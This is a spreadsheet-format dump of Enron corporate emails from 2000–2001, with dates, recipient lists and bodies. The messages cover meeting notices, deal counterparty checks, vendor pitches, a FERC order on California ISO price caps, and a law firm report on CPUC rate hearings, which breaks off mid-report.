Seminars-on-Demand (version 2.1) for the energy and electric power_x000D_
industries._x000D_
_x000D_
Seminars-on-Demand is a completely new way to train employees in the_x000D_
critical subject areas of energy derivatives, electricity trading, and_x000D_
proper_x000D_
deal structuring techniques. It eliminates the time and distance constraints_x000D_
that frequently preclude live classroom training and enables employees to_x000D_
increase their value in a cost-effective and time-efficient manner._x000D_
http://www.seminars-on-demand.com/whatis.html_x000D_
_x000D_
"In today's marketplace, a well-trained staff is a firm's most powerful_x000D_
strategic weapon. This new product finally allows a company to deliver_x000D_
training across the entire organization in a cost-effective and timely_x000D_
manner", said PGS Energy Training CEO John Adamiak._x000D_
_x000D_
Seminars-on-Demand works by combining an innovative CD-ROM_x000D_
seminar presentation with a matching instructional manual and phone-based_x000D_
instructor/student interaction.  Two-week, annual and unlimited corporate_x000D_
enterprise licenses are available._x000D_
_x000D_
Free Preview CDs are available by calling 412-279-9298, visiting_x000D_
www.seminars-on-demand.com, or by visiting the PGS Energy Training_x000D_
booth at PowerMart in Houston next week._x000D_
_x000D_
Established in 1990, PGS Energy Training delivers in-depth training programs_x000D_
in energy derivatives, electricity trading and gas-to-electricity arbitrage._x000D_
In addition to its new Seminars-on-Demand CD-ROM based training, PGS_x000D_
Energy Training offers on-site classroom programs, open registration public_x000D_
seminars and confidential training for senior executives._x000D_
_x000D_
 PGS ENERGY TRAINING_x000D_
600 North Bell Avenue,  Carnegie Office Park  Bldg. 2, Suite 2708_x000D_
Carnegie, PA 15106_x000D_
Phone: 412-279-9298     Fax: 412-276-4676_x000D_
_x000D_
 www.seminars-on-demand.com_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 18 Oct 2001 14:13:43 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'ken.powers@enron.com', 'mark.gigliotti@enron.com', 'rachel.cady@enron.com', 'craig.buehler@enron.com', 'lisa.gilchrist@enron.com', 'wayne.feng@enron.com', 'rick.dietz@enron.com', 'hasan.kedwaii@enron.com', 'gerry.medeles@enron.com', 'andy.brady@enron.com', 'lisa.sutton@enron.com', 'theresa.hess@enron.com', 'jo.williams@enron.com', 'jane.joyce@enron.com', 'jim.gutman@enron.com', 'wendy.koh@enron.com', 'teb.lokey@enron.com', 'rita.bianchi@enron.com', 'andriy.mysyk@enron.com', 'jeanne.licciardo@enron.com', 'sheila.nacey@enron.com', 'elizabeth.brown@enron.com', 'kimberly.watson@enron.com', 'ranelle.paladino@enron.com', 'lisa.sawyer@enron.com', 'maggie.matheson@enron.com', 'michele.winckowski@enron.com', 'dari.dornan@enron.com', 'frazier.king@enron.com', 'terry.lehn@enron.com', 'bradley.holmes@enron.com', 'lindy.donoho@enron.com', 'linda.trevino@enron.com'})</t>
  </si>
  <si>
    <t>Ops Cmte Mtg 10/19 cancelled</t>
  </si>
  <si>
    <t>The CMS/CRS Ops Cmte Mtg scheduled for Friday, 10/19 has been cancelled.  We will resume these meetings in approximately 2 weeks._x000D_
Thanks.</t>
  </si>
  <si>
    <t>frozenset({'james.scribner@enron.com', 'sheri.thomas@enron.com', 'beth.apollo@enron.com', 'leslie.reeves@enron.com', 'brenda.herod@enron.com', 'shona.wilson@enron.com', 'bob.hall@enron.com'})</t>
  </si>
  <si>
    <t>Jana Gionannini, in the recruiting department has received our request for _x000D_
summer interns, and would like to know if you would like for your intern to _x000D_
have finance or accounting background.  Sally asked me to contact you for _x000D_
this information.  Please respond today if possible._x000D_
_x000D_
_x000D_
Beth Apollo 1_x000D_
Brenda Herod 2_x000D_
Shona Wilson 2_x000D_
Sheri Thomas 1_x000D_
Bob Hall 2_x000D_
James Scribner 2_x000D_
Leslie Reeves 2_x000D_
_x000D_
Total 12</t>
  </si>
  <si>
    <t>Fri, 8 Dec 2000 05:38:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'joan.quick@enron.com', 'susan.smith@enron.com', 'marilyn.colbert@enron.com', 'michael.morris@enron.com', 'sylvia.campos@enron.com', 'faye.ellis@enron.com', 'justin.timothy@enron.com', 'robert.cass@enron.com', 'genia.fitzgerald@enron.com', 'patrice.mims@enron.com', 'brad.coleman@enron.com', 'sylvia.pollan@enron.com', 'mary.gosnell@enron.com', 'connie.sutton@enron.com', "karen.o'day@enron.com", 'lisa.carver@enron.com', 'elizabeth.hernandez@enron.com', 'larry.hunter@enron.com', 'edward.terry@enron.com', 'dianne.seib@enron.com', 'melissa.graves@enron.com', 'christa.winfrey@enron.com', 'kenneth.harmon@enron.com', 'shonnie.daniel@enron.com', 'stephanie.panus@enron.com', 'jeff.richter@enron.com', 'anita.patton@enron.com', 'cyril.price@enron.com', 'melba.lozano@enron.com', 'colleen.sullivan@enron.com', 'elsa.villarreal@enron.com', 'eol.center@enron.com', 'anthony.campos@enron.com', 'vance.taylor@enron.com', 'bill.hare@enron.com', 'irene.flynn@enron.com', 'jason.moore@enron.com', 'victor.lamadrid@enron.com', 'debbie.brackett@enron.com', 'amelia.alland@enron.com', 'camille.gerard@enron.com', 'mark.thorne@enron.com', 'richard.miley@enron.com', 'samuel.schott@enron.com', 'mary.smith@enron.com', 'laura.vargas@enron.com', 'oscar.rivera@enron.com', 'kimberlee.bennick@enron.com', 'peter.berzins@enron.com', 'donald.reinhardt@enron.com', 'brenda.herod@enron.com', 'scotty.gilbert@enron.com', 'clem.cernosek@enron.com', 'bernice.rodriguez@enron.com', 'jennifer.oliver@enron.com', 'john.powell@enron.com', 'claudia.clark@enron.com', 'susan.elledge@enron.com', 'kate.symes@enron.com', 'james.scribner@enron.com', 'peggy.hedstrom@enron.com', 'andrew.lewis@enron.com', 'richard.mckeel@enron.com', 'tara.sweitzer@enron.com', 'chris.mallory@enron.com', 'nella.cappelletto@enron.com', 'edward.baughman@enron.com', 'daren.farmer@enron.com', 'tony.harris@enron.com', 'geoff.storey@enron.com', 'lauri.allen@enron.com', 'kim.theriot@enron.com', 'russell.diamond@enron.com', 'nanette.kettler@enron.com', 'jefferson.sorenson@enron.com', 'bridgette.anderson@enron.com', 'rahil.jafry@enron.com', "romeo.d'souza@enron.com", 'sanjeev.gupta@enron.com', 'scott.lytle@enron.com', 'cheryl.dawes@enron.com', 'carrie.southard@enron.com', 'marilyn.schoppe@enron.com', 'gary.lamphier@enron.com', 'enron.facilities@enron.com', 'joshua.meachum@enron.com', 'keith.clark@enron.com', 'walter.guidroz@enron.com', 'willie.stewart@enron.com', 'scott.mills@enron.com', 'john.suttle@enron.com', 'fred.boas@enron.com', 'fiona.skinner@enron.com', 'john.nowlan@enron.com', 'shawna.flynn@enron.com', 'veronica.espinoza@enron.com', 'marlene.hilliard@enron.com', 'karen.lambert@enron.com', 'george.weissman@enron.com', 'kori.loibl@enron.com', 'lisa.gillette@enron.com', 'sony.wilson@enron.com', 'kristian.lande@enron.com', 'richard.pinion@enron.com', 'enron.counterparty@enron.com', 'mike.croucher@enron.com', 'tom.moore@enron.com', 'jackie.morgan@enron.com', 'cheryl.dudley@enron.com', 'carlos.rodriguez@enron.com', 'rhonda.denton@enron.com', 'linda.bryan@enron.com', 'claire.viejou@enron.com', 'hoong.foon@enron.com', 'jacquelyn.farriel@enron.com', 'rousseau.anai@enron.com', 'andrea.guillen@enron.com', 'sherry.dawson@enron.com', 'jim.little@enron.com', 'glenda.mitchell@enron.com', 'stacy.dickson@enron.com', 'elsie.lew@enron.com', 'julie.meyers@enron.com', 'matt.motsinger@enron.com', 'carey.metz@enron.com', 'robert.walker@enron.com', 'carolyn.gilley@enron.com', 'robert.cotten@enron.com', 'randall.gay@enron.com', 'bradley.diebner@enron.com', 'susan.flynn@enron.com', 'cary.carrabine@enron.com', 'rebecca.ford@enron.com', 'phillip.platter@enron.com', 'nathan.hlavaty@enron.com', 'torrey.moorer@enron.com', 'debra.perlingiere@enron.com', 'katherine.kelly@enron.com', 'monica.lande@enron.com', 'amita.gosalia@enron.com', 'philippe.travis@enron.com', 'karin.williams@enron.com', 'michael.eiben@enron.com', 'sheri.thomas@enron.com', 'liz.hillman@enron.com', 'hillary.mack@enron.com', 'tracy.ngo@enron.com', 'jeremy.morris@enron.com', 'anne.bike@enron.com', 'veronica.thompson@enron.com', 'frank.davis@enron.com', 'nidia.mendoza@enron.com', 'brad.schneider@enron.com', 'b.palmer@enron.com', 'david.hardy@enron.com', 'lisa.lees@enron.com', 'susan.trevino@enron.com', 'matilda.machado@enron.com', 'simone.rose@enron.com', 'jeremy.wong@enron.com', 'sam.round@enron.com', 'stephanie.sever@enron.com', 'diane.ellstrom@enron.com', 'regina.perkins@enron.com', 'jim.homco@enron.com', 'laurel.adams@enron.com', 'dale.neuner@enron.com', 'brant.reves@enron.com', 'suzy.robey@enron.com', 'james.shirley@enron.com', 'rita.wynne@enron.com', 'michele.small@enron.com', 'donna.consemiu@enron.com', 'arfan.aziz@enron.com', 'noel.petterson@enron.com', 'bruce.mills@enron.com', 'pat.clynes@enron.com', 'cindy.horn@enron.com', 'jennifer.denny@enron.com', 'lesli.campbell@enron.com', 'georgia.blanchard@enron.com', 'carla.hoffman@enron.com', 'cyndie.balfour-flanagan@enron.com', 'troy.klussmann@enron.com', 'lynn.shivers@enron.com', 'gary.nelson@enron.com', 'tana.jones@enron.com', 'debbie.nicholls@enron.com', 'stacey.richardson@enron.com', 'frank.ortiz@enron.com', 'winston.goodbody@enron.com', "o'neal.winfree@enron.com", 'jennifer.blay@enron.com', 'leslie.reeves@enron.com', 'bob.bowen@enron.com'})</t>
  </si>
  <si>
    <t>Name Correction</t>
  </si>
  <si>
    <t>The attached is a name correction that substantially affects the legal name, _x000D_
so I am sending notification to all of you._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
If there is no objection, the ERMS short name on this record will be changed _x000D_
on Monday, Dec. 11, after 1:p, CST</t>
  </si>
  <si>
    <t>Mon, 22 May 2000 04:20:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'anthony.campos@enron.com', 'tana.jones@enron.com', 'susan.flynn@enron.com', 'carol.clair@enron.com', 'sara.shackleton@enron.com', 'susan.bailey@enron.com', 'mark.taylor@enron.com'})</t>
  </si>
  <si>
    <t>Global Contracts Meeting</t>
  </si>
  <si>
    <t>The Global Contracts Meeting will be held on Wednesday, May 24, 2000, at _x000D_
12:00 in 46C1.  Lunch will be served.</t>
  </si>
  <si>
    <t>Thu, 22 Mar 2001 07:05:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: deal 557724</t>
  </si>
  <si>
    <t xml:space="preserve">Check with Rhonda Denton._x000D_
_x000D_
Thanks!!_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
   Kate Symes @ ECT                03/22/2001 03:01 PM_x000D_
_x000D_
To: Evelyn Metoyer/Corp/Enron@ENRON_x000D_
cc:  _x000D_
_x000D_
Subject: Re: deal 557724  _x000D_
_x000D_
It's changed to APS. I'm wondering about the status of APS and Pinnacle - I _x000D_
guess the traders here had heard we were now doing our trades with Pinnacle, _x000D_
not APS. Is this incorrect? Do you know who might know about that?_x000D_
_x000D_
Thanks,_x000D_
kate_x000D_
_x000D_
_x000D_
_x000D_
Evelyn Metoyer@ENRON_x000D_
03/22/2001 12:13 PM_x000D_
To: Kate Symes/PDX/ECT@ECT_x000D_
cc:  _x000D_
_x000D_
Subject: deal 557724_x000D_
_x000D_
_x000D_
Tom ALonso_x000D_
deal 557724_x000D_
Bloomberg shows cp name as Arizona Public Service and enpower has Pinnacle _x000D_
West_x000D_
Can you please check with Tom on the correct cp name.  _x000D_
_x000D_
_x000D_
Thanks_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 31 Jul 2000 20:07:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'chris.foster@enron.com', 'david.parquet@enron.com', 'mary.hain@enron.com', 'jeff.dasovich@enron.com', 'james.steffes@enron.com', 'elsa.piekielniak@enron.com', 'tim.belden@enron.com', 'mona.petrochko@enron.com', 'scott.vonderheide@enron.com', 'bruno.gaillard@enron.com', 'dennis.benevides@enron.com', 'roger.yang@enron.com', 'sandra.mccubbin@enron.com', 'paul.kaufman@enron.com', 'steven.kean@enron.com', 'robert.badeer@enron.com'})</t>
  </si>
  <si>
    <t xml:space="preserve">Dan Douglass summarized this.  This really puts CA and the ISO on notice that _x000D_
they cannot confiscate the power as they seem ready to do -- FERC reiterates _x000D_
that the generators can sell power wherever they want because the cap is a _x000D_
cap on ISO purchases.  ANd if the ISO want to set a sale price cap it has to _x000D_
file with FERC, wait 60 days and amend its contract_x000D_
---------------------- Forwarded by Susan J Mara/SFO/EES on 08/01/2000 01:01 _x000D_
AM ---------------------------_x000D_
_x000D_
_x000D_
"Daniel Douglass" &lt;douglass@ArterHadden.com&gt; on 07/31/2000 07:27:24 PM_x000D_
To: &lt;peter.bray@att.net&gt;, &lt;JBarthrop@electric.com&gt;, &lt;mnelson@electric.com&gt;, _x000D_
&lt;rschlanert@electric.com&gt;, &lt;Bruno_Gaillard@enron.com&gt;, &lt;kmagrude@enron.com&gt;, _x000D_
&lt;mpetroch@enron.com&gt;, &lt;susan_j_mara@enron.com&gt;, &lt;athomas@newenergy.com&gt;, _x000D_
&lt;bchen@newenergy.com&gt;, &lt;Jeff.Hanson@phaser.com&gt;, &lt;anchau@shellus.com&gt;, _x000D_
&lt;andrew.madden@utility.com&gt;, &lt;ben.reyes@utility.com&gt;, _x000D_
&lt;chris.king@utility.com&gt;, &lt;david.bayless@utility.com&gt;_x000D_
cc:  _x000D_
Subject: FERC Order on Morgan Stanley Complaint Against ISO_x000D_
_x000D_
_x000D_
We have good news on the ISO price caps front.  The FERC has made it_x000D_
clear that ISO does not have the ability to mandate that generators sell to _x000D_
ISO at its price caps and that the proper response to inadequate supply is to _x000D_
lift the price caps._x000D_
_x000D_
On Friday, the FERC issued its Order on Complaint in connection with the July _x000D_
10 complaint filed by Morgan Stanley Capital Group Inc. ("MS").  As you may _x000D_
recall, MS requested FERC to issue a stay of the ISO's maximum purchase price _x000D_
authority and to direct the ISO to reverse any price cap reductions.  MS _x000D_
sought Fast Track processing pursuant to Rule 206(h), which was granted by _x000D_
FERC on the grounds that the complaint "warrants expeditious action."_x000D_
_x000D_
As a quick background summary for you, last November, FERC issued an order _x000D_
approving Tariff Amendment 21 which extended ISO's price cap authority _x000D_
through 11/15/00.  That order stated that the ISO "maximum purchase price was _x000D_
not a cap on what the seller may charge the ISO, but a cap on what the ISO _x000D_
was willing to pay."  The Commission said that sellers dissatisfied with the _x000D_
price cap could "choose to sell those services into the California Power _x000D_
Exchange or bilateral markets."_x000D_
_x000D_
FERC notes in Friday's Order that the 6/28 the ISO's Board resolution lowered _x000D_
the caps to $500 and ISO further directed that, "To the extent permitted by _x000D_
law, regulation and pre-existing contract, Management shall direct generators _x000D_
to bid in all their capacity when system load exceeds 38,000 MW."_x000D_
_x000D_
The MS complaint alleged that the cap reduction was unlawful and would, _x000D_
"threaten the stability and integroty of the marketplace."  MS also requested _x000D_
an emergency technical conference to examine ISO's justification for the _x000D_
price cap reduction._x000D_
_x000D_
FERC denied the MS stay request, as well as its request that the $750 maximum _x000D_
purchase price be reinstated.  The Commission reiterates that it is not _x000D_
approving a cap on sellers' prices, because they can sell at whatever price _x000D_
they want.  Rather ISO has simply stated the maximum price it is willing to _x000D_
pay.  "Because sellers are not required to sell to the ISO, the ISO cannot _x000D_
dictate their price."_x000D_
_x000D_
Importantly, however, FERC also states that, "ISO has no more or less ability _x000D_
to procure capacity and energy than any other buyer of these services....if _x000D_
the ISO is unable to elicit sufficient supplies at or below its announced _x000D_
purchase price ceiling (because generators are free to sell elsewhere if they _x000D_
choose), it will have to raise its purchase price to the level necessary to _x000D_
meet its needs."  [Emphasis added]  FERC then notes that this may lead to an _x000D_
increase in Out of Market ("OOM") calls and that OOM calls are not subject to _x000D_
a maximum purchase price._x000D_
_x000D_
Also, with regard to the ISO's resolution stating that generators must bid _x000D_
their capacity into the ISO markets when system load exceeds 38,000 MW, FERC _x000D_
states clearly that, "such a requirement is not permitted by our November  12 _x000D_
Order and the ISO tariff."  [Emphasis added]_x000D_
_x000D_
FERC goes on to say that any requirement to sell to ISO in conjunction with a _x000D_
maximum purchase price would require significant revisions to ISO's market _x000D_
rules, which could not be made effective without a corresponding amendment to _x000D_
ISO's tariff.  This would require 60 days' advance notice, "and could not be _x000D_
implemented prior to Commission approval.  As stated above, our November 12 _x000D_
Order was clearly based on the premise that the proper response to inadequate _x000D_
supply (due to a low maximum purchase price) is to raise the maximum purchase _x000D_
price."_x000D_
_x000D_
ISO is then "put on notice that any amendment to mandate sales must be _x000D_
accompanied by a demonstration that this extreme measure is the proper _x000D_
response to low supplies in the ISO markets."_x000D_
_x000D_
Concurrences were filed by Commissioners Massey and Hebert.  Massey suggests _x000D_
that the state has to facilitate solutions to market issues, such as risk _x000D_
management tools, removing constraints on hedging opportunities, introducing _x000D_
real time pricing through real time metering and expediting approval of new _x000D_
generation and transmission projects in California.  Hebert says that the _x000D_
previous November Order tried to "straddle the fence" and that, "Today, the _x000D_
Commission at least starts to lean slightly in the right direction of _x000D_
recognizing that we have a role."  He then reiterates his preference for _x000D_
removing all price caps.  He also suggests that, "Getting to the bottom of _x000D_
the problem, in my view, requires us to begin a proceeding to rescind our _x000D_
approval of the ISO as operator of the California grid.  The record supports _x000D_
such a move."  He refers approvingly to the Collins resignation letter, _x000D_
stating that it, "thoughtfully outlines consequences to the market of a _x000D_
return to 'command and control.' "  Hebert states that, "The independence of _x000D_
the ISO's governing structure stands threatened.  We should 'stand up,' to _x000D_
quote the resignation letter."  Hebert advocates opening a section 206 _x000D_
proceeding now, as part of the recently announced inquiry into bulk power _x000D_
markets, "including the California markets."_x000D_
_x000D_
This decision makes it clear that ISO cannot lower the caps at tomorrow's _x000D_
meeting and expect that sellers will be required to sell to it at that _x000D_
price.  This is an important development and very good news in our ongoing _x000D_
efforts to seek economic sanity at the ISO._x000D_
_x000D_
Please call if you have any questions._x000D_
_x000D_
Dan_x000D_
</t>
  </si>
  <si>
    <t>Tue, 10 Jul 2001 08:08:35 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'michael.kopper@enron.com', 'vasant.shanbhogue@enron.com', 'paula.rieker@enron.com', 'janet.dietrich@enron.com', 'gregory.adams@enron.com', 'elizabeth.tilney@enron.com', 'mitch.taylor@enron.com', 'jeff.donahue@enron.com', 'barbara.paige@enron.com', 'kelly.kimberly@enron.com', 'dennis.vegas@enron.com', 'michael.terraso@enron.com', 'louise.kitchen@enron.com', 'jean.mrha@enron.com', 'richard.lewis@enron.com', 'exec.jones@enron.com', 'shelley.corman@enron.com', 'jordan.mintz@enron.com', 'danny.mccarty@enron.com', 'a..shankman@enron.com', 'kirk.mcdaniel@enron.com', 'sean.long@enron.com', 'mark.palmer@enron.com', "tim.o'rourke@enron.com"})</t>
  </si>
  <si>
    <t>SENT ON BEHALF OF CINDY OLSON - Culture Committee Presentation</t>
  </si>
  <si>
    <t xml:space="preserve">We will have a meeting on July 16 at 4:00 in EB16c1 to discuss the attached presentation, which will be presented to Ken Lay and Jeff Skilling on July 31, 3:00-4:00 (location TBD)._x000D_
_x000D_
Please review your part of the presentation and be prepared to finalize what you will be presenting to Ken and Jeff on July 31._x000D_
_x000D_
It is critical that you are in attendance._x000D_
_x000D_
Thanks everyone!_x000D_
Kathy McMahon for Cindy Olson_x000D_
_x000D_
_x000D_
 _x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 11 Sep 2000 01:52:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'cheryl.dawes@enron.com'})</t>
  </si>
  <si>
    <t>Re: TAGG Deal NK4420.1</t>
  </si>
  <si>
    <t xml:space="preserve">Cheryl,_x000D_
_x000D_
The deal was done with one of the California Power Books.  We use the _x000D_
ECC/RISKMANTRA to book any deal with an Enron subsidiary...not just Canadian _x000D_
deals.  So, I don't think this deal has anything to do with the Canada _x000D_
office.  Let me know if you need more information._x000D_
_x000D_
Susan_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
To: Susan M Scott/HOU/ECT@ECT_x000D_
cc: Frank Cernosek/HOU/ECT@ECT, Shannon McPearson/HOU/ECT@ECT _x000D_
Subject: TAGG Deal NK4420.1_x000D_
_x000D_
Hi Susan_x000D_
_x000D_
I am trying to verify the liquidations for financial close and noted that _x000D_
TAGG deal NK4420.1 entered by yourself_x000D_
shows ECC (Enron Canada Corp) as the counterparty._x000D_
_x000D_
Here in Canada, we do not to deals at NGI-PGE/CG and I do not believe that _x000D_
the book PWR-NG-LTCA is a Canadian_x000D_
book.  A review of the audit trial indicates that the counterparty used to be _x000D_
EPMI.  Is it possible it was changed by_x000D_
mistake to ECC._x000D_
_x000D_
Can you please look into this deal first thing Monday morning as we need to _x000D_
book the liquidations Monday am for_x000D_
financial close and let me know what you think about this deal._x000D_
_x000D_
Thanks for your help._x000D_
_x000D_
Cheryl_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 2 May 2001 05:39:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'lisa.burnett@enron.com', 'miguel.garcia@enron.com', 'mauricio.trejo@enron.com', 'rogers.herndon@enron.com', 'diana.allen@enron.com', 'chad.starnes@enron.com', 'jeffrey.miller@enron.com', 'keith.comeaux@enron.com', 'smith.day@enron.com', 'dean.laurent@enron.com', 'anna.santucci@enron.com', 'joe.quenet@enron.com', 'william.abler@enron.com', 'claudia.guerra@enron.com', 'maria.valdes@enron.com', 'joe.errigo@enron.com', 'joseph.wagner@enron.com', 'robert.benson@enron.com', 'lisa.shoemake@enron.com', 'jeff.king@enron.com', 'justin.laverell@enron.com', 'jewell.wade@enron.com', 'karla.compean@enron.com', 'edward.baughman@enron.com', 'eric.saibi@enron.com', 'doug.gilbert-smith@enron.com', 'terri.clynes@enron.com', 'chris.lenartowicz@enron.com', 'chris.dorland@enron.com', 'russell.ballato@enron.com', 'gerald.gilbert@enron.com', 'mark.davis@enron.com', 'mike.kelly@enron.com', 'john.forney@enron.com', 'benjamin.rogers@enron.com', 'steve.wang@enron.com', 'larry.jester@enron.com', 'clint.dean@enron.com', 'david.ryan@enron.com', 'john.kinser@enron.com', 'don.baughman@enron.com', 'erik.serio@enron.com', 'fletcher.sturm@enron.com', 'kevin.presto@enron.com', 'patrick.hanse@enron.com', 'corry.bentley@enron.com', 'andy.pace@enron.com', 'richard.broussard@enron.com', 'ramanarao.tamma@enron.com', 'rika.imai@enron.com', 'christopher.watts@enron.com', 'kevin.cline@enron.com', 'juan.padron@enron.com', 'ted.ballinger@enron.com', 'kayne.coulter@enron.com', 'doug.miller@enron.com', 'jason.choate@enron.com', 'gary.justice@enron.com', 'larry.campbell@enron.com', 'tom.may@enron.com', 'rudy.acevedo@enron.com', 'paul.broderick@enron.com', 'madhup.kumar@enron.com', 'steve.olinde@enron.com', 'mike.carson@enron.com', 'christi.nicolay@enron.com', 'robert.stalford@enron.com', 'george.diaz@enron.com', 'tamara.black@enron.com', 'doug.sewell@enron.com', 'laura.podurgiel@enron.com', 'clayton.vernon@enron.com', 'grace.kim@enron.com', 'gautam.gupta@enron.com', 'joe.stepenovitch@enron.com', 'andy.rodriquez@enron.com', 'garrett.tripp@enron.com', 'oscar.dalton@enron.com', 'jim.homco@enron.com', 'lloyd.will@enron.com', 'gretchen.lotz@enron.com', 'larry.valderrama@enron.com', 'narsimha.misra@enron.com', 'matt.lorenz@enron.com', 'dustin.collins@enron.com', 'peter.makkai@enron.com', 'juan.hernandez@enron.com', 'mark.symms@enron.com'})</t>
  </si>
  <si>
    <t>YOUR ARE INVITED!!!!</t>
  </si>
  <si>
    <t>Please join us for a pre summer party on Friday, May 11th @ 6pm.  Please see _x000D_
the attached invitation and map to Lloyd Will's house.  _x000D_
_x000D_
 - DRT2617.PPT_x000D_
                                                _x000D_
_x000D_
_x000D_
We would like to get a RSVP as soon as possible for an accurate head count.  _x000D_
Hope to see you there!!!!_x000D_
_x000D_
_x000D_
Thanks Tjae</t>
  </si>
  <si>
    <t>Mon, 29 Oct 2001 08:12:05 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'joshn@induslogic.com'})</t>
  </si>
  <si>
    <t>Regarding Development Work</t>
  </si>
  <si>
    <t xml:space="preserve">Steven,_x000D_
_x000D_
I am contacting you with a unique offer that will help Enron Corp. reduce_x000D_
IT/software development and maintenance costs by up to 80% of what your_x000D_
paying today.  I hope you are the right point of contact as I am writing to_x000D_
a number of people at your organization in a variety of roles._x000D_
_x000D_
We have a large team of the best developers in India, the majority of who_x000D_
were originally computer science graduates out of the Indian Institute of_x000D_
Technology (India's premier technology university). These engineers are_x000D_
experts in both commercial and application software development with_x000D_
experience implementing industry standard methodologies. We provide_x000D_
unbeatable rates on quality engineers with a proven track record of success_x000D_
in J2EE, XML, SOAP and Web Services._x000D_
_x000D_
Our rates start at $6/hr for offshore and $19/hr for onsite. We are_x000D_
committed to 100% satisfaction and guarantee completely the quality of our_x000D_
work.  There is no catch and there is no risk._x000D_
_x000D_
If you do not believe you are the right person to consider this proposal, I_x000D_
would appreciate it if you could forward it to the appropriate_x000D_
person/people, as I am certain they will find this offer very attractive._x000D_
If you'd prefer not to be considered for this, please let me know._x000D_
_x000D_
Again, thank you Steven, I appreciate your help. If you have any specific_x000D_
questions, please don't hesitate to call me._x000D_
_x000D_
Josh Nussbaum_x000D_
Induslogic Inc._x000D_
Phone: 703-516-4200 x20_x000D_
Email: josh@induslogic.com_x000D_
</t>
  </si>
  <si>
    <t>Mon, 1 Jan 2001 05:11:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'mark.haedicke@enron.com', 'travis.mccullough@enron.com', 'elizabeth.sager@enron.com', 'richard.sanders@enron.com'})</t>
  </si>
  <si>
    <t>Commission Hearings on Rate Stabilization Plans---FYI</t>
  </si>
  <si>
    <t xml:space="preserve">----- Forwarded by Sheila Tweed/HOU/ECT on 01/01/2001 01:10 PM -----_x000D_
_x000D_
	KMcspadden@milbank.com_x000D_
	12/30/2000 04:18 PM_x000D_
		 _x000D_
		 To: mcutbirth@aquantis.com, jcpaulin@aol.com, _x000D_
sthompson@seawestwindpower.com, john.lamb@enron.com, eric.newell@enron.com, _x000D_
David.Lloyd@nrgenergy.com, drro@dynegy.com, b.buchynsky@dgc-us.com, _x000D_
BBuchynsky@aol.com, m.saito@dgc-us.com, jonathan_berman@westlb.com, _x000D_
jared_brenner@westlb.com, Lou.Stoler@enron.com, Sheila.Tweed@enron.com, _x000D_
grant.ahearn@uboc.com, kenneth.bowman@uboc.com, lhart@btmna.com, _x000D_
gnofsinger@cobank.com, j_manson@republic-financial.com, _x000D_
rkeefe@macquarie.com.au, kbarkaus@macquarie.com.au, meckleyj@us.cibc.com, _x000D_
drevers@jhancock.com, jtisdale@jhancock.com, mpittman@jhancock.com, _x000D_
adgpgh@aol.com, hemmito@texaco.com, mike@babcockbrown.com, _x000D_
wgarnett@jajones.com, bgarnett@jajones.com, peter.gaw@abnamro.com, _x000D_
steven.bissonnette@abnamro.com, ed.tomeo@uaecorp.com, jonathan.bram@csfb.com, _x000D_
james.bartlett@csfb.com, michael_l_jines@reliantenergy.com, _x000D_
sangorgon@aol.com, bredderr@us.socgen.com, eric.mccartney@kb.be, _x000D_
winbee@pacbell.net, icarter@electric.com, jbarthrop@electric.com_x000D_
		 cc: EFeo@milbank.com, KWong@milbank.com, AMarks@milbank.com_x000D_
		 Subject: Commission Hearings on Rate Stabilization Plans_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
You are undoubtedly aware of the critical energy situation in California.? _x000D_
Among other things, the FERC has issued an order for the restructuring of the _x000D_
wholesale market and the California PUC is continuing hearings on rate relief _x000D_
for the investor owned utilities and other issues.? We are monitoring the _x000D_
hearings in both Washington and California and advising our friends and _x000D_
clients as developments occur.? The following is our most recent report._x000D_
_x000D_
Hearings on PG&amp;E's and SCE's rate stabilization plans continued on Friday _x000D_
with testimony by Walter Campbell, Director of Business and Financial _x000D_
Planning at PG&amp;E, who presented PG&amp;E's prima facie case, and James Asseltine, _x000D_
Managing Director at Lehman Brothers, who testified as to PG&amp;E's financial _x000D_
condition. President Lynch attended the hearings in the morning (I understand _x000D_
that the 3 Republican appointed Commissioners are on vacation and have been _x000D_
noticeably absent from the hearings).? Hearings will continue on Tuesday, _x000D_
January 2 with testimony from Edison.? Also on Tuesday, an all party meeting _x000D_
will be held with Commissioner Wood, presumably for the purpose of _x000D_
facilitating settlement negotiations (on Thursday, December 28, Governor _x000D_
Davis facilitated a similar meeting between the utilities and consumer groups _x000D_
with little progress).? The Commission meeting is scheduled for Thursday, _x000D_
January 4, at which time the Commission is expected to issue a final order (a _x000D_
copy of the final order may be posted on the Commission's website at _x000D_
www.cpuc.ca.gov 15 minutes prior to the meeting)._x000D_
_x000D_
PG&amp;E is requesting: _x000D_
_x000D_
1.? An end to the rate freeze. _x000D_
2.? An explicit statement that procurement costs are recoverable in rates _x000D_
from retail customers.? Surprisingly, Mr. Campbell indicated that rate _x000D_
recovery on a going forward basis from the October or November billing _x000D_
periods may be a survivable outcome for PG&amp;E (this was later downplayed on _x000D_
redirect examination)._x000D_
_x000D_
3.? A meaningful rate increase.? Mr. Campbell indicated that PG&amp;E would be _x000D_
satisfied with a 26% increase in rates. _x000D_
4.? Follow up means of subsequent rate increases.? Mr. Campbell indicated _x000D_
that customers could expect rate increases totaling up to 40% over the next _x000D_
two years depending on market conditions._x000D_
_x000D_
SCE, who will be cross-examined on Tuesday, is asking for a larger rate _x000D_
increase--an average of 30% immediately, to be followed by an undetermined _x000D_
number of 5% rate hikes over the next two years._x000D_
_x000D_
The following facts came out in the cross-examination of PG&amp;E: _x000D_
_x000D_
